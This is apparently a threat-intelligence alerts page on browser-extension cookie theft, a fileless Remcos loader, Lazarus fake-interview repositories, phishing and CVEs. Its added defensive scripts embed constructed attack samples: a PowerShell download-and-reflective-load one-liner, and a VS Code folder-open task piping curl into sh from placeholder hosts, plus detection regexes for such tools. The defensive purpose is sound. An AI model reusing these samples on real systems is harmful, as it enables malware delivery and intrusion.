Threat Alerts
Your place for the latest CyberProof cyber threat intelligence alerts and updates
Malicious Chrome Extensions Target Enterprise HR Platform Credentials
A coordinated campaign involving multiple malicious browser extensions was identified targeting enterprise HR and ERP environments, enabling long-term account compromise through session hijacking and interference with security controls. The activity poses a high organizational risk: it grants unauthorized access to sensitive workforce, payroll, and financial systems while actively obstructing standard containment actions. Because the extension keeps harvesting fresh tokens from the endpoint, the resulting access survives password resets, session invalidation, and routine incident response workflows that do not remove the extension itself, significantly widening the impact window of a single compromised endpoint.
The extensions present themselves as legitimate productivity or access-management tools and request permissions that look consistent with enterprise platform usage. Once installed, they start a chained infection flow that begins with continuous extraction of authentication session cookies for the targeted platforms. The stolen tokens are periodically exfiltrated to external infrastructure and monitored for changes, so the attacker regains access whenever the user reauthenticates. Some variants also hook the browser's request handling to silently reinject stolen session data into outbound traffic, while others support direct cookie injection, letting attackers assume authenticated sessions without credentials or multi-factor challenges.
In parallel, complementary components interfere with security visibility and response by blocking access to administrative and identity-management interfaces within the affected platforms. This is achieved through DOM manipulation and aggressive page monitoring that removes content and forces navigation errors whenever sensitive security pages are opened, including password management, account disabling, authentication history, and audit functions. Anti-analysis techniques are embedded to obstruct inspection and conceal the malicious behavior. Taken together, these capabilities indicate a deliberately segmented but unified operation designed to maintain control, limit detection, and prevent remediation, reflecting a mature approach to enterprise session abuse rather than opportunistic credential theft. Because the blocking runs inside the victim's browser, containment actions (disabling the account, revoking sessions, reviewing authentication history) should be carried out from a clean administrative host rather than from the affected endpoint, and the extension itself must be removed; otherwise it simply harvests the next session.
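One check a practitioner will want after reading the above is a permission audit of the extensions already installed in the fleet. The script below is an added example, not part of the CyberProof alert and not code from the campaign: it scores a Chrome extension manifest for the permission combinations the alert describes, cookie access paired with broad host permissions, request-rewriting permissions that allow header (cookie) reinjection, and content scripts injected at document_start into every frame. The two manifests are constructed for the example; the indicator weights and tiers are the example's own heuristics; the profile path walked by find_manifests is the standard Chrome layout (Extensions/<id>/<version>/manifest.json) and is only used when the script is run directly.

```python
import json
import os
from pathlib import Path

# Permissions that let an extension observe or rewrite HTTP traffic. Weights below are
# this example's own heuristics, not indicators published for this campaign.
REQUEST_REWRITE = {"webRequest", "webRequestBlocking", "declarativeNetRequest",
                   "declarativeNetRequestWithHostAccess"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def is_host_pattern(p: str) -> bool:
    """Chrome match patterns look like scheme://host/path, or the literal <all_urls>."""
    return p == "<all_urls>" or "://" in p


def is_broad(p: str) -> bool:
    return p in BROAD_HOSTS


def audit_manifest(manifest: dict) -> dict:
    """Score one manifest.json (MV2 or MV3) for session-theft capability."""
    perms = set(manifest.get("permissions", []))
    # MV2 lists host patterns under "permissions"; MV3 moves them to "host_permissions".
    hosts = {p for p in perms if is_host_pattern(p)} | set(manifest.get("host_permissions", []))
    broad = any(is_broad(h) for h in hosts)
    findings, score = [], 0

    if "cookies" in perms and hosts:
        scope = "every site" if broad else ", ".join(sorted(hosts))
        findings.append("cookies: can read session cookies for %s" % scope)
        score += 3 if broad else 2
    if perms & REQUEST_REWRITE and hosts:
        findings.append("request rewrite: %s can alter outbound headers (cookie reinjection)"
                        % ", ".join(sorted(perms & REQUEST_REWRITE)))
        score += 2
    for cs in manifest.get("content_scripts", []):
        matches = cs.get("matches", [])
        if cs.get("run_at") == "document_start" and any(is_broad(m) for m in matches):
            findings.append("content script at document_start on %s (DOM tampering before page scripts run)"
                            % ", ".join(matches))
            score += 2
            if cs.get("all_frames"):
                score += 1  # also reaches the admin UIs that live in iframes
    if "scripting" in perms and hosts:
        findings.append("scripting: can inject code into pages on demand")
        score += 1
    if perms & {"tabs", "webNavigation"}:
        findings.append("tabs/webNavigation: can watch which security pages the user opens")
        score += 1

    tier = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return {"name": manifest.get("name", "?"), "score": score, "tier": tier, "findings": findings}


def find_manifests(profile_dir):
    """Yield (path, manifest) for every extension version under a Chrome profile."""
    for path in Path(profile_dir, "Extensions").glob("*/*/manifest.json"):
        with open(path, encoding="utf-8-sig") as f:  # some manifests carry a BOM
            yield path, json.load(f)


# Constructed manifests for the example: one harmless popup, one shaped like the
# extensions described above. Neither is a real extension.
BENIGN = {"name": "Word Counter", "manifest_version": 3,
          "permissions": ["storage"], "action": {"default_popup": "popup.html"}}

SUSPICIOUS = {
    "name": "HR Access Helper", "manifest_version": 3,
    "permissions": ["cookies", "webRequest", "declarativeNetRequestWithHostAccess",
                    "scripting", "tabs", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["watch.js"],
                         "run_at": "document_start", "all_frames": True}],
}

if __name__ == "__main__":
    for m in (BENIGN, SUSPICIOUS):
        print(json.dumps(audit_manifest(m), indent=2))
    # Default Windows profile; adjust for other profiles or operating systems.
    default = Path(os.environ.get("LOCALAPPDATA", ""), "Google", "Chrome", "User Data", "Default")
    for path, manifest in find_manifests(default):
        result = audit_manifest(manifest)
        if result["tier"] != "low":
            print(result["tier"].upper(), result["name"], path)
```

The score only says what an extension is able to do, not what it does; a legitimate password manager will also land in the medium or high tier. The point is to produce a short list of extensions whose permission set matches the capabilities in the alert, which can then be reviewed against the enterprise allow list or force-installed set.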
SHADOW#REACTOR Observed Using Fileless Techniques to Load Remcos RAT
A new Windows-based malware campaign tracked as SHADOW#REACTOR was uncovered delivering the Remcos remote access Trojan (RAT) through a layered and evasive execution chain designed to minimize on-disk artifacts. The activity relies on scripted loaders and text-based payload retrieval, ultimately executing the final malware directly in memory. This approach reduces visibility for traditional signature-based controls and enables sustained access without deploying a conventional executable.
The attack chain begins with a malicious script, likely delivered via phishing or social engineering, which launches an obfuscated PowerShell process. Rather than downloading a single payload, the script retrieves multiple text files from attacker-controlled infrastructure and reconstructs the malicious components from them at runtime. The components are then loaded into memory, with obfuscation and anti-analysis protections applied to hinder reverse engineering. Native Windows tooling is used throughout, blending the activity with legitimate system behavior. Because every stage still passes through the PowerShell engine, script block logging (Event ID 4104) and AMSI see the reconstructed code at execution time even though it never touches disk, which is where detection for this chain should focus.
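As an added example (not code from CyberProof or from the campaign), the function below triages PowerShell script block log entries (Event ID 4104, ScriptBlockText) for the staged loader pattern the alert describes: a hidden window, download of .txt fragments, concatenation and Base64 decoding of the result, and a reflective in-memory load. The indicator names, patterns, weights and threshold are the example's own choices, not published indicators for SHADOW#REACTOR, and the three log entries are constructed; tune the threshold against your own baseline before alerting on it.

```python
import re

# Indicator patterns for the fileless, text-staged PowerShell loader pattern described
# above. Names, patterns, weights and THRESHOLD are this example's own choices, not
# indicators published for SHADOW#REACTOR. Matching is done on the lower-cased text.
INDICATORS = [
    ("hidden_window",       r"-w(?:indowstyle)?\s+hidden", 1),
    ("encoded_command",     r"-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 2),
    ("web_download",        r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloaddata|downloadfile)\b", 2),
    ("text_staging",        r"""https?://[^\s'"]+\.txt\b""", 2),
    ("base64_decode",       r"frombase64string", 2),
    ("fragment_reassembly", r"\$\w+\s*\+\s*\$\w+|-join\b|\[char\[\]\]", 1),
    ("reflective_load",     r"\[(?:system\.)?reflection\.assembly\]::load\(", 3),
    ("in_memory_invoke",    r"\.invoke\(|\biex\b|invoke-expression", 2),
]
THRESHOLD = 5  # a single download of a .txt file (score 4) stays below it on purpose


def score_script_block(script: str) -> dict:
    """Return the matched indicator names and a weighted score for one script block."""
    text = script.lower()
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"score": score, "hits": hits, "suspicious": score >= THRESHOLD}


def triage(events: list) -> list:
    """Score every 4104 event in order; other event IDs are skipped."""
    results = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        result = score_script_block(ev["script"])
        result.update(host=ev.get("host"), record=ev.get("record"))
        results.append(result)
    return results


# Constructed log entries in the shape of Microsoft-Windows-PowerShell/Operational 4104.
# 203.0.113.10 is documentation address space, used here as a placeholder.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS01", "record": 1,
     "script": r"Get-ChildItem C:\Users -Recurse | Where-Object { $_.Length -gt 1MB } | Select-Object FullName, Length"},
    {"event_id": 4104, "host": "WS01", "record": 2,
     "script": "Invoke-WebRequest -Uri https://updates.example.com/release-notes.txt -OutFile C:\\temp\\notes.txt"},
    {"event_id": 4104, "host": "WS02", "record": 3,
     "script": ("powershell.exe -w hidden -nop -c \"$a=(New-Object Net.WebClient).DownloadString('http://203.0.113.10/p1.txt');"
                "$b=(New-Object Net.WebClient).DownloadString('http://203.0.113.10/p2.txt');"
                "$bytes=[Convert]::FromBase64String($a+$b);"
                "[System.Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null,$null)\"")},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['host']} record {r['record']}: score={r['score']} {flag} {r['hits']}")
```

The second entry shows why a weighted score is used rather than single-indicator matching: an administrator fetching a release-notes file scores on the download and .txt indicators alone, while the loader also reassembles fragments, Base64-decodes them and loads the result reflectively, and it is that combination that separates the two.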
This campaign reflects a continued shift toward low-noise, fileless delivery techniques commonly associated with commodity RAT deployment. While no specific threat actor has been publicly attributed, the tooling and delivery methods align with financially motivated operations seeking persistent remote access for follow-on activity such as credential theft, data collection, or resale of access. The use of trusted system utilities and text-based staging highlights ongoing challenges for defenders in detecting early-stage intrusion activity.
Unauthenticated DoS Vulnerability Impacts GlobalProtect Firewalls
A high-severity denial-of-service vulnerability has been identified in Palo Alto Networks firewall products, specifically affecting the GlobalProtect VPN and secure remote-access platform used to protect enterprise networks. Tracked as CVE-2026-0227 (CVSS 7.7), the flaw allows unauthenticated attackers to remotely disrupt firewall operations, potentially forcing affected devices into maintenance mode through repeated exploitation. With thousands of exposed firewalls reachable online, the vulnerability poses a serious risk to organizations that depend on these systems for perimeter defense and secure remote access.
The issue is an improper check for exceptional conditions (CWE-754) in the GlobalProtect component of next-generation firewalls running PAN-OS 10.1 and later. When a GlobalProtect gateway or portal is enabled, attackers can trigger the flaw without any authentication, so exposure is limited to firewalls that publish a portal or gateway, and inventorying which of those face the internet is the first triage step. The vulnerability impacts both on-premises and cloud-based deployments, although most cloud instances have already been patched. While no active exploitation has been confirmed, the combination of unauthenticated access, service-disrupting impact and a large exposed attack surface underscores the need for immediate remediation to prevent firewall outages and potential follow-on attacks during periods of degraded protection.
Lazarus Group Targets Developers via Contagious Interview Campaign
North Korean threat actors have launched the "Contagious Interview" campaign, targeting software developers through fake recruitment offers on platforms like Upwork and LinkedIn. This social engineering operation uses malicious code repositories disguised as technical assessments to deploy a two-layer malware chain that steals credentials and cryptocurrency wallets and establishes persistent remote access on victim systems.
The attack employs three infection vectors, tried in turn. The most dangerous is a VS Code tasks configuration (.vscode/tasks.json) set to run automatically when the project folder is opened, so the developer never has to execute anything by hand; VS Code's Workspace Trust restricted mode disables tasks, which means accepting the prompt to trust the folder is what arms this vector. A second vector embeds hooks in the project's server code, where legitimate-looking functions trigger payload downloads once the application is run. If both fail, the malware attempts to install malicious npm dependencies. Once triggered, the malware downloads a Node.js controller that operates entirely in memory and deploys five specialized modules: a keylogger, a screenshot tool, a file grabber, a clipboard monitor, and a browser stealer targeting Chrome, Brave, and Opera databases.
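Before opening an unsolicited "assessment" repository, a developer or reviewer can check for exactly the hooks described above. The script below is an added example, not CyberProof's or the campaign's code: it scans a checkout for VS Code tasks configured with runOn: folderOpen, npm lifecycle scripts that execute during npm install, and dependencies resolved from outside the npm registry, and it flags ordinary tasks whose command pipes a download into a shell. The sample repository it builds is constructed for the example, including the 203.0.113.5 placeholder address. One simplification to note: load_jsonc strips only whole-line // comments from tasks.json.

```python
import json
import re
import tempfile
from pathlib import Path

# npm runs these script names on its own during `npm install`.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Dependency specs that resolve outside the npm registry (URLs, git, local paths).
NON_REGISTRY = re.compile(r"^(?:https?://|git\+|git://|github:|gitlab:|bitbucket:|file:)")
# Command fragments worth a second look in any task. The example's own list.
DOWNLOAD_AND_RUN = re.compile(r"curl|wget|iwr|invoke-webrequest|powershell|node\s+-e|\|\s*(?:sh|bash|node)\b", re.I)


def load_jsonc(path: Path) -> dict:
    """tasks.json allows // comments; drop whole-line comments before parsing.
    Simplification: inline trailing comments and trailing commas are not handled."""
    lines = [ln for ln in path.read_text(encoding="utf-8").splitlines()
             if not ln.strip().startswith("//")]
    return json.loads("\n".join(lines))


def scan_repo(root) -> list:
    """Return a list of findings ({kind, where, detail}) for one checkout."""
    root = Path(root)
    findings = []

    tasks_file = root / ".vscode" / "tasks.json"
    if tasks_file.is_file():
        for task in load_jsonc(tasks_file).get("tasks", []):
            cmd = " ".join(str(x) for x in [task.get("command", ""), *task.get("args", [])] if x)
            run_on = (task.get("runOptions") or {}).get("runOn")
            if run_on == "folderOpen":  # executes on folder open, no user action needed
                findings.append({"kind": "vscode_auto_task", "where": ".vscode/tasks.json",
                                 "detail": f"{task.get('label')}: {cmd}"})
            elif DOWNLOAD_AND_RUN.search(cmd):
                findings.append({"kind": "vscode_suspicious_task", "where": ".vscode/tasks.json",
                                 "detail": f"{task.get('label')}: {cmd}"})

    pkg_file = root / "package.json"
    if pkg_file.is_file():
        pkg = json.loads(pkg_file.read_text(encoding="utf-8"))
        for name, cmd in (pkg.get("scripts") or {}).items():
            if name in LIFECYCLE_HOOKS:
                findings.append({"kind": "npm_lifecycle_script", "where": "package.json",
                                 "detail": f"{name}: {cmd}"})
        for section in ("dependencies", "devDependencies", "optionalDependencies"):
            for name, spec in (pkg.get(section) or {}).items():
                if NON_REGISTRY.match(str(spec)):
                    findings.append({"kind": "non_registry_dependency",
                                     "where": f"package.json/{section}",
                                     "detail": f"{name}: {spec}"})
    return findings


# Constructed sample files shaped like the lure described above; not real artifacts.
TASKS_JSON = r"""{
  // Presented as a harmless dev helper; runs as soon as the folder is opened and trusted.
  "version": "2.0.0",
  "tasks": [
    {
      "label": "prepare workspace",
      "type": "shell",
      "command": "sh -c 'curl -fsSL http://203.0.113.5/setup.sh | sh'",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    },
    { "label": "lint", "type": "shell", "command": "npx eslint ." }
  ]
}
"""

PACKAGE_JSON = """{
  "name": "assessment-task",
  "version": "1.0.0",
  "scripts": { "test": "jest", "postinstall": "node ./scripts/telemetry.js" },
  "dependencies": {
    "express": "^4.18.2",
    "config-helper": "http://203.0.113.5/config-helper-1.0.0.tgz"
  }
}
"""


def build_sample_repo() -> Path:
    """Write the constructed files into a fresh temp directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="assessment-"))
    (root / ".vscode").mkdir()
    (root / ".vscode" / "tasks.json").write_text(TASKS_JSON, encoding="utf-8")
    (root / "package.json").write_text(PACKAGE_JSON, encoding="utf-8")
    return root


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_repo()
    for f in scan_repo(target):
        print(f"[{f['kind']}] {f['where']}: {f['detail']}")
```

Run it against a real checkout with the path as the first argument. A folderOpen task or a lifecycle script is not malicious by itself, but in a repository handed over by a stranger either one deserves to be read before the folder is trusted in VS Code or npm install is run.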
Following initial infection, Python payloads establish stronger persistence through startup-folder entries and scheduled tasks named after legitimate Windows processes such as RuntimeBroker.exe. The malware creates hidden directories in system folders and deploys the XMRig cryptocurrency miner disguised as msedge.exe. The campaign infrastructure spans multiple Vercel-hosted distribution domains and dedicated command-and-control servers running Express.js on Windows Server 2019/2022. Analysis reveals 64 layers of obfuscation protecting the final payload, along with 1,000 Pastebin accounts used for dead-drop resolution. The operators demonstrate mature operational security, with real-time monitoring capabilities and strict credential compartmentalization across their infrastructure.
Browser-in-the-Browser Phishing Drives a New Trend in Social Media Attacks
A rising trend in phishing activity is targeting Facebook users through the increasingly sophisticated Browser-in-the-Browser technique, as reported by Trellix, in which attackers embed a fake but highly convincing login pop-up directly inside an active browser tab rather than redirecting victims to a suspicious website. These forged windows replicate legitimate branding, lock icons and URL displays while silently harvesting credentials, making traditional advice such as checking the address bar ineffective. The forged pop-up is only an HTML element inside the page, so it cannot be dragged outside the real tab's viewport and never appears as a separate window to the operating system; that remains a practical tell, as does entering credentials only after navigating to the site directly. To further evade detection, attackers host phishing pages on trusted cloud platforms and use layered redirects and URL shorteners, often delivering lures framed as urgent account violations, copyright complaints or security alerts. This shift reflects a broader evolution in phishing tactics that blends advanced front-end deception with reputable infrastructure, reducing the visual indicators of fraud and increasing the likelihood of successful credential compromise.
Chrome Patches High-Severity Browser Engine Vulnerabilities
Google has patched three high-severity vulnerabilities affecting core Chrome browser components, including the V8 JavaScript engine and the Blink rendering engine. The most serious, CVE-2026-0899, is an out-of-bounds memory access in V8; it is rated High in the Chrome release, although its CVSS base score of 9.8 falls in the Critical band of the CVSS scale. It could allow remote code execution in the context of the logged-on user if a victim is lured to a malicious or compromised webpage. Code execution obtained through a V8 bug lands inside Chrome's renderer sandbox, so reaching the rest of the endpoint additionally requires a sandbox escape, which is why such bugs are typically chained; even so, successful exploitation could enable attackers to run attacker-controlled code, manipulate data, or establish an initial foothold within the affected environment.
The two further vulnerabilities, CVE-2026-0900 and CVE-2026-0901 (both also scored CVSS 9.8), stem from implementation weaknesses in Chrome's JavaScript execution and rendering components and could be abused to bypass expected execution boundaries with similar code-execution outcomes. While no in-the-wild exploitation has been reported, browser engine vulnerabilities remain a preferred target for both financially motivated and state-aligned threat actors because the browser is constantly exposed to untrusted web content. Given Chrome's widespread use across enterprise environments, successful exploitation could provide a highly scalable initial access vector, particularly where browsers are used to access internal applications and cloud services, so the update should be deployed and verified across the fleet rather than left to individual users' restart habits.